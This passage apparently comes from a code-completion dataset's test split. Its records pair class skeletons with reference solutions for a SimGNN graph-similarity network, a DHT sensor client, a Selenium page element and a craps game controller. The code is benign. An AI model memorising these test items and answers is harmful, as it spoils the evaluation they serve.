:param edge_index: Edge indices. :param features: Feature matrix. :return features: Absstract feature matrix.\"\"\"\n <|body_4|>\n\n def forward(self, data):\n \"\"\"Forward pass with graphs. :param data: Data dictiyonary. :return score: Similarity score.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SimGNN, self).__init__()\n self.args = args\n self.number_labels = number_of_labels\n self.setup_layers()\n<|end_body_0|>\n\n<|body_start_1|>\n if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\n else:\n self.feature_count = self.args.tensor_neurons\n<|end_body_1|>\n\n<|body_start_2|>\n self.calculate_bottleneck_features()\n self.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\n self.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\n self.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\n self.attention = AttentionModule(self.args)\n self.tensor_network = TenorNetworkModule(self.args)\n self.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\n self.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)\n<|end_body_2|>\n\n<|body_start_3|>\n scores = torch.mm(abstract_features_1, abstract_features_2).detach()\n scores = scores.view(-1, 1)\n hist = torch.histc(scores, bins=self.args.bins)\n hist = hist / torch.sum(hist)\n hist = hist.view(1, -1)\n return hist\n<|end_body_3|>\n\n<|body_start_4|>\n features = self.convolution_1(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_2(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_3(features, edge_index)\n return features\n<|end_body_4|>\n\n<|body_start_5|>\n edge_index_1 = data['edge_index_1']\n edge_index_2 = data['edge_index_2']\n features_1 = data['features_1']\n features_2 = data['features_2']\n abstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\n abstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\n if self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\n pooled_features_1 = self.attention(abstract_features_1)\n pooled_features_2 = self.attention(abstract_features_2)\n scores = self.tensor_network(pooled_features_1, pooled_features_2)\n scores = torch.t(scores)\n if self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\n scores = torch.nn.functional.relu(self.fully_connected_first(scores))\n score = torch.sigmoid(self.scoring_layer(scores))\n return score\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000337", "length_bytes": 8576, "license_type": "no_license", "methods": [{"docstring": ":param args: Arguments object. :param number_of_labels: Number of node labels.", "name": "__init__", "signature": "def __init__(self, args, number_of_labels)"}, {"docstring": "Deciding the shape of the bottleneck layer.", "name": "calculate_bottleneck_features", "signature": "def calculate_bottleneck_features(self)"}, {"docstring": "Creating the layers.", "name": "setup_layers", "signature": "def setup_layers(self)"}, {"docstring": "Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histsogram of similarity scores.", "name": "calculate_histogram", "signature": "def calculate_histogram(self, abstract_features_1, abstract_features_2)"}, {"docstring": "Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Absstract feature matrix.", "name": "convolutional_pass", "signature": "def convolutional_pass(self, edge_index, features)"}, {"docstring": "Forward pass with graphs. :param data: Data dictiyonary. :return score: Similarity score.", "name": "forward", "signature": "def forward(self, data)"}], "n_methods": 6, "prompt": "Implement the Python class `SimGNN` described below.\n\nClass description:\nSimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\n\nMethod signatures and docstrings:\n- def __init__(self, args, number_of_labels): :param args: Arguments object. :param number_of_labels: Number of node labels.\n- def calculate_bottleneck_features(self): Deciding the shape of the bottleneck layer.\n- def setup_layers(self): Creating the layers.\n- def calculate_histogram(self, abstract_features_1, abstract_features_2): Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histsogram of similarity scores.\n- def convolutional_pass(self, edge_index, features): Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Absstract feature matrix.\n- def forward(self, data): Forward pass with graphs. :param data: Data dictiyonary. :return score: Similarity score.", "prompted_full_text": "Implement the Python class `SimGNN` described below.\n\nClass description:\nSimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\n\nMethod signatures and docstrings:\n- def __init__(self, args, number_of_labels): :param args: Arguments object. :param number_of_labels: Number of node labels.\n- def calculate_bottleneck_features(self): Deciding the shape of the bottleneck layer.\n- def setup_layers(self): Creating the layers.\n- def calculate_histogram(self, abstract_features_1, abstract_features_2): Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histsogram of similarity scores.\n- def convolutional_pass(self, edge_index, features): Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Absstract feature matrix.\n- def forward(self, data): Forward pass with graphs. :param data: Data dictiyonary. :return score: Similarity score.\n\n<|skeleton|>\nclass SimGNN:\n \"\"\"SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\"\"\"\n\n def __init__(self, args, number_of_labels):\n \"\"\":param args: Arguments object. :param number_of_labels: Number of node labels.\"\"\"\n <|body_0|>\n\n def calculate_bottleneck_features(self):\n \"\"\"Deciding the shape of the bottleneck layer.\"\"\"\n <|body_1|>\n\n def setup_layers(self):\n \"\"\"Creating the layers.\"\"\"\n <|body_2|>\n\n def calculate_histogram(self, abstract_features_1, abstract_features_2):\n \"\"\"Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histsogram of similarity scores.\"\"\"\n <|body_3|>\n\n def convolutional_pass(self, edge_index, features):\n \"\"\"Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Absstract feature matrix.\"\"\"\n <|body_4|>\n\n def forward(self, data):\n \"\"\"Forward pass with graphs. :param data: Data dictiyonary. :return score: Similarity score.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SimGNN, self).__init__()\n self.args = args\n self.number_labels = number_of_labels\n self.setup_layers()\n<|end_body_0|>\n\n<|body_start_1|>\n if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\n else:\n self.feature_count = self.args.tensor_neurons\n<|end_body_1|>\n\n<|body_start_2|>\n self.calculate_bottleneck_features()\n self.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\n self.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\n self.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\n self.attention = AttentionModule(self.args)\n self.tensor_network = TenorNetworkModule(self.args)\n self.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\n self.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)\n<|end_body_2|>\n\n<|body_start_3|>\n scores = torch.mm(abstract_features_1, abstract_features_2).detach()\n scores = scores.view(-1, 1)\n hist = torch.histc(scores, bins=self.args.bins)\n hist = hist / torch.sum(hist)\n hist = hist.view(1, -1)\n return hist\n<|end_body_3|>\n\n<|body_start_4|>\n features = self.convolution_1(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_2(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_3(features, edge_index)\n return features\n<|end_body_4|>\n\n<|body_start_5|>\n edge_index_1 = data['edge_index_1']\n edge_index_2 = data['edge_index_2']\n features_1 = data['features_1']\n features_2 = data['features_2']\n abstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\n abstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\n if self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\n pooled_features_1 = self.attention(abstract_features_1)\n pooled_features_2 = self.attention(abstract_features_2)\n scores = self.tensor_network(pooled_features_1, pooled_features_2)\n scores = torch.t(scores)\n if self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\n scores = torch.nn.functional.relu(self.fully_connected_first(scores))\n score = torch.sigmoid(self.scoring_layer(scores))\n return score\n<|end_body_5|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass SimGNN:\n \"\"\"SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\"\"\"\n\n def __init__(self, args, number_of_labels):\n \"\"\":param args: Arguments object. :param number_of_labels: Number of node labels.\"\"\"\n <|body_0|>\n\n def calculate_bottleneck_features(self):\n \"\"\"Deciding the shape of the bottleneck layer.\"\"\"\n <|body_1|>\n\n def setup_layers(self):\n \"\"\"Creating the layers.\"\"\"\n <|body_2|>\n\n def calculate_histogram(self, abstract_features_1, abstract_features_2):\n \"\"\"Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histsogram of similarity scores.\"\"\"\n <|body_3|>\n\n def convolutional_pass(self, edge_index, features):\n \"\"\"Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Absstract feature matrix.\"\"\"\n <|body_4|>\n\n def forward(self, data):\n \"\"\"Forward pass with graphs. :param data: Data dictiyonary. :return score: Similarity score.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SimGNN:\n \"\"\"SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\"\"\"\n\n def __init__(self, args, number_of_labels):\n \"\"\":param args: Arguments object. :param number_of_labels: Number of node labels.\"\"\"\n super(SimGNN, self).__init__()\n self.args = args\n self.number_labels = number_of_labels\n self.setup_layers()\n\n def calculate_bottleneck_features(self):\n \"\"\"Deciding the shape of the bottleneck layer.\"\"\"\n if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\n else:\n self.feature_count = self.args.tensor_neurons\n\n def setup_layers(self):\n \"\"\"Creating the layers.\"\"\"\n self.calculate_bottleneck_features()\n self.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\n self.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\n self.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\n self.attention = AttentionModule(self.args)\n self.tensor_network = TenorNetworkModule(self.args)\n self.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\n self.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)\n\n def calculate_histogram(self, abstract_features_1, abstract_features_2):\n \"\"\"Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histsogram of similarity scores.\"\"\"\n scores = torch.mm(abstract_features_1, abstract_features_2).detach()\n scores = scores.view(-1, 1)\n hist = torch.histc(scores, bins=self.args.bins)\n hist = hist / torch.sum(hist)\n hist = hist.view(1, -1)\n return hist\n\n def convolutional_pass(self, edge_index, features):\n \"\"\"Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Absstract feature matrix.\"\"\"\n features = self.convolution_1(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_2(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_3(features, edge_index)\n return features\n\n def forward(self, data):\n \"\"\"Forward pass with graphs. :param data: Data dictiyonary. :return score: Similarity score.\"\"\"\n edge_index_1 = data['edge_index_1']\n edge_index_2 = data['edge_index_2']\n features_1 = data['features_1']\n features_2 = data['features_2']\n abstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\n abstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\n if self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\n pooled_features_1 = self.attention(abstract_features_1)\n pooled_features_2 = self.attention(abstract_features_2)\n scores = self.tensor_network(pooled_features_1, pooled_features_2)\n scores = torch.t(scores)\n if self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\n scores = torch.nn.functional.relu(self.fully_connected_first(scores))\n score = torch.sigmoid(self.scoring_layer(scores))\n return score\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_benedekrozemberczki_SimGNN.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "91bc824fbc850b3a8d04607956fc21673b175379", "bodies": ["self.sensor = sensor\nself.pin = getattr(board, pin)\nself.data = {}\nself.name = name", "dht = self.sensor(self.pin)\ntry:\n temperature = dht.temperature\n humidity = dht.humidity\nexcept RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\nexcept Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\nelse:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\nfinally:\n dht.exit()"], "bodies_text": "<|body_start_0|>\n self.sensor = sensor\n self.pin = getattr(board, pin)\n self.data = {}\n self.name = name\n<|end_body_0|>\n\n<|body_start_1|>\n dht = self.sensor(self.pin)\n try:\n temperature = dht.temperature\n humidity = dht.humidity\n except RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\n except Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\n else:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\n finally:\n dht.exit()\n<|end_body_1|>\n", "class_docstring": "Get the latest data from the DHT sensor.", "class_name": "DHTClient", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DHTClient:\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n\n def __init__(self, sensor, pin, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n def update(self):\n \"\"\"Get the latest data the DHT sensor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.sensor = sensor\n self.pin = getattr(board, pin)\n self.data = {}\n self.name = name\n<|end_body_0|>\n\n<|body_start_1|>\n dht = self.sensor(self.pin)\n try:\n temperature = dht.temperature\n humidity = dht.humidity\n except RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\n except Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\n else:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\n finally:\n dht.exit()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000338", "length_bytes": 5733, "license_type": "permissive", "methods": [{"docstring": "Initialize the sensor.", "name": "__init__", "signature": "def __init__(self, sensor, pin, name)"}, {"docstring": "Get the latest data the DHT sensor.", "name": "update", "signature": "def update(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003833", "prompt": "Implement the Python class `DHTClient` described below.\n\nClass description:\nGet the latest data from the DHT sensor.\n\nMethod signatures and docstrings:\n- def __init__(self, sensor, pin, name): Initialize the sensor.\n- def update(self): Get the latest data the DHT sensor.", "prompted_full_text": "Implement the Python class `DHTClient` described below.\n\nClass description:\nGet the latest data from the DHT sensor.\n\nMethod signatures and docstrings:\n- def __init__(self, sensor, pin, name): Initialize the sensor.\n- def update(self): Get the latest data the DHT sensor.\n\n<|skeleton|>\nclass DHTClient:\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n\n def __init__(self, sensor, pin, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n def update(self):\n \"\"\"Get the latest data the DHT sensor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.sensor = sensor\n self.pin = getattr(board, pin)\n self.data = {}\n self.name = name\n<|end_body_0|>\n\n<|body_start_1|>\n dht = self.sensor(self.pin)\n try:\n temperature = dht.temperature\n humidity = dht.humidity\n except RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\n except Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\n else:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\n finally:\n dht.exit()\n<|end_body_1|>\n", "revision_id": "8de7966104911bca6f855a1755a6d71a07afb9de", "skeleton": "<|skeleton|>\nclass DHTClient:\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n\n def __init__(self, sensor, pin, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n def update(self):\n \"\"\"Get the latest data the DHT sensor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DHTClient:\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n\n def __init__(self, sensor, pin, name):\n \"\"\"Initialize the sensor.\"\"\"\n self.sensor = sensor\n self.pin = getattr(board, pin)\n self.data = {}\n self.name = name\n\n def update(self):\n \"\"\"Get the latest data the DHT sensor.\"\"\"\n dht = self.sensor(self.pin)\n try:\n temperature = dht.temperature\n humidity = dht.humidity\n except RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\n except Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\n else:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\n finally:\n dht.exit()\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/dht/sensor.py", "source_repo": "AlexxIT/home-assistant", "split": "test", "star_events_count": 9} {"blob_id": "471c02e0b1c3c61658bf1b20b8b9e89c69aba3a2", "bodies": ["driver = obj.driver\nif self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\nWebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\ndriver.find_element_by_css_selector(self.locator[1]).send_keys(value)", "driver = obj.driver\nif self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\nWebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\nelement = driver.find_element_by_css_selector(self.locator[1])\nreturn element.get_attribute('value')"], "bodies_text": "<|body_start_0|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n driver.find_element_by_css_selector(self.locator[1]).send_keys(value)\n<|end_body_0|>\n\n<|body_start_1|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n element = driver.find_element_by_css_selector(self.locator[1])\n return element.get_attribute('value')\n<|end_body_1|>\n", "class_docstring": "Base page class that is initialized on every page object class.", "class_name": "BasePageElement", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BasePageElement:\n \"\"\"Base page class that is initialized on every page object class.\"\"\"\n\n def __set__(self, obj, value):\n \"\"\"Sets the text to the value supplied\"\"\"\n <|body_0|>\n\n def __get__(self, obj, owner):\n \"\"\"Gets the text of the specified object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n driver.find_element_by_css_selector(self.locator[1]).send_keys(value)\n<|end_body_0|>\n\n<|body_start_1|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n element = driver.find_element_by_css_selector(self.locator[1])\n return element.get_attribute('value')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000339", "length_bytes": 1105, "license_type": "no_license", "methods": [{"docstring": "Sets the text to the value supplied", "name": "__set__", "signature": "def __set__(self, obj, value)"}, {"docstring": "Gets the text of the specified object", "name": "__get__", "signature": "def __get__(self, obj, owner)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007355", "prompt": "Implement the Python class `BasePageElement` described below.\n\nClass description:\nBase page class that is initialized on every page object class.\n\nMethod signatures and docstrings:\n- def __set__(self, obj, value): Sets the text to the value supplied\n- def __get__(self, obj, owner): Gets the text of the specified object", "prompted_full_text": "Implement the Python class `BasePageElement` described below.\n\nClass description:\nBase page class that is initialized on every page object class.\n\nMethod signatures and docstrings:\n- def __set__(self, obj, value): Sets the text to the value supplied\n- def __get__(self, obj, owner): Gets the text of the specified object\n\n<|skeleton|>\nclass BasePageElement:\n \"\"\"Base page class that is initialized on every page object class.\"\"\"\n\n def __set__(self, obj, value):\n \"\"\"Sets the text to the value supplied\"\"\"\n <|body_0|>\n\n def __get__(self, obj, owner):\n \"\"\"Gets the text of the specified object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n driver.find_element_by_css_selector(self.locator[1]).send_keys(value)\n<|end_body_0|>\n\n<|body_start_1|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n element = driver.find_element_by_css_selector(self.locator[1])\n return element.get_attribute('value')\n<|end_body_1|>\n", "revision_id": "43ab187a9bca4c56d6005a46725c56f39949fceb", "skeleton": "<|skeleton|>\nclass BasePageElement:\n \"\"\"Base page class that is initialized on every page object class.\"\"\"\n\n def __set__(self, obj, value):\n \"\"\"Sets the text to the value supplied\"\"\"\n <|body_0|>\n\n def __get__(self, obj, owner):\n \"\"\"Gets the text of the specified object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BasePageElement:\n \"\"\"Base page class that is initialized on every page object class.\"\"\"\n\n def __set__(self, obj, value):\n \"\"\"Sets the text to the value supplied\"\"\"\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n driver.find_element_by_css_selector(self.locator[1]).send_keys(value)\n\n def __get__(self, obj, owner):\n \"\"\"Gets the text of the specified object\"\"\"\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n element = driver.find_element_by_css_selector(self.locator[1])\n return element.get_attribute('value')\n", "source": "the_stack_v2_python_sparse", "source_path": "skynet/driver/base_page_element.py", "source_repo": "bsterrett/ye_olde_skynet", "split": "test", "star_events_count": 3} {"blob_id": "2aedc91471a6a83ed9ded18e3bb939363b892580", "bodies": ["self.pair = PairOfDice()\nself.point = None\nself.origin_point = None", "input('Please enter to roll the dice...\\n')\nself.pair.roll_dice()\nself.point = self.pair.current_value()", "WIN_POINTS = [7, 11]\nLOSE_POINTS = [2, 3, 12]\nif self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\nelif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\nelse:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()", "LOSE_POINT = 7\nself.start_play()\nwhile self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\nelse:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. You lose.'.format(self.point))"], "bodies_text": "<|body_start_0|>\n self.pair = PairOfDice()\n self.point = None\n self.origin_point = None\n<|end_body_0|>\n\n<|body_start_1|>\n input('Please enter to roll the dice...\\n')\n self.pair.roll_dice()\n self.point = self.pair.current_value()\n<|end_body_1|>\n\n<|body_start_2|>\n WIN_POINTS = [7, 11]\n LOSE_POINTS = [2, 3, 12]\n if self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\n elif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()\n<|end_body_2|>\n\n<|body_start_3|>\n LOSE_POINT = 7\n self.start_play()\n while self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\n else:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. You lose.'.format(self.point))\n<|end_body_3|>\n", "class_docstring": "", "class_name": "GameController", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GameController:\n\n def __init__(self):\n \"\"\"creat a PairOfDice() object, initialize the point and score value\"\"\"\n <|body_0|>\n\n def start_play(self):\n \"\"\"Start to play the game, roll the dice and get current value\"\"\"\n <|body_1|>\n\n def show_result(self):\n \"\"\"get the result based on the rules\"\"\"\n <|body_2|>\n\n def continue_game(self):\n \"\"\"didn't get the result, continue to play, compare the point with the origin_point\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.pair = PairOfDice()\n self.point = None\n self.origin_point = None\n<|end_body_0|>\n\n<|body_start_1|>\n input('Please enter to roll the dice...\\n')\n self.pair.roll_dice()\n self.point = self.pair.current_value()\n<|end_body_1|>\n\n<|body_start_2|>\n WIN_POINTS = [7, 11]\n LOSE_POINTS = [2, 3, 12]\n if self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\n elif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()\n<|end_body_2|>\n\n<|body_start_3|>\n LOSE_POINT = 7\n self.start_play()\n while self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\n else:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. You lose.'.format(self.point))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000340", "length_bytes": 1536, "license_type": "no_license", "methods": [{"docstring": "creat a PairOfDice() object, initialize the point and score value", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Start to play the game, roll the dice and get current value", "name": "start_play", "signature": "def start_play(self)"}, {"docstring": "get the result based on the rules", "name": "show_result", "signature": "def show_result(self)"}, {"docstring": "didn't get the result, continue to play, compare the point with the origin_point", "name": "continue_game", "signature": "def continue_game(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_004668", "prompt": "Implement the Python class `GameController` described below.\n\nClass description:\nImplement the GameController class.\n\nMethod signatures and docstrings:\n- def __init__(self): creat a PairOfDice() object, initialize the point and score value\n- def start_play(self): Start to play the game, roll the dice and get current value\n- def show_result(self): get the result based on the rules\n- def continue_game(self): didn't get the result, continue to play, compare the point with the origin_point", "prompted_full_text": "Implement the Python class `GameController` described below.\n\nClass description:\nImplement the GameController class.\n\nMethod signatures and docstrings:\n- def __init__(self): creat a PairOfDice() object, initialize the point and score value\n- def start_play(self): Start to play the game, roll the dice and get current value\n- def show_result(self): get the result based on the rules\n- def continue_game(self): didn't get the result, continue to play, compare the point with the origin_point\n\n<|skeleton|>\nclass GameController:\n\n def __init__(self):\n \"\"\"creat a PairOfDice() object, initialize the point and score value\"\"\"\n <|body_0|>\n\n def start_play(self):\n \"\"\"Start to play the game, roll the dice and get current value\"\"\"\n <|body_1|>\n\n def show_result(self):\n \"\"\"get the result based on the rules\"\"\"\n <|body_2|>\n\n def continue_game(self):\n \"\"\"didn't get the result, continue to play, compare the point with the origin_point\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.pair = PairOfDice()\n self.point = None\n self.origin_point = None\n<|end_body_0|>\n\n<|body_start_1|>\n input('Please enter to roll the dice...\\n')\n self.pair.roll_dice()\n self.point = self.pair.current_value()\n<|end_body_1|>\n\n<|body_start_2|>\n WIN_POINTS = [7, 11]\n LOSE_POINTS = [2, 3, 12]\n if self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\n elif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()\n<|end_body_2|>\n\n<|body_start_3|>\n LOSE_POINT = 7\n self.start_play()\n while self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\n else:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. You lose.'.format(self.point))\n<|end_body_3|>\n", "revision_id": 